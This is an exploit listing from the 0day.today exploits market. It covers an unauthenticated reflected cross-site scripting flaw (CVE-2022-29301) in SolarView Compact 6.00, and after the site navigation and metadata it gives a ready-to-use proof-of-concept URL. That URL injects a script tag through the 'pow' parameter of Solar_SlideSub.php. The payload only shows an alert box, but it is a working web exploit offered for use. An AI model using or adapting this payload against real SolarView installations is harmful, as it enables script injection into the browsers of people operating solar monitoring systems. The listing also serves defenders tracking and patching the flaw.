[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SolarView Compact 6.00 - (pow) Cross-Site Scripting Vulnerability

Author
Ahmed Alroky
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37799
Category
web applications
Date add
14-06-2022
CVE
CVE-2022-29301
Platform
php
# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows

# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green

#  0day.today [2024-11-16]  #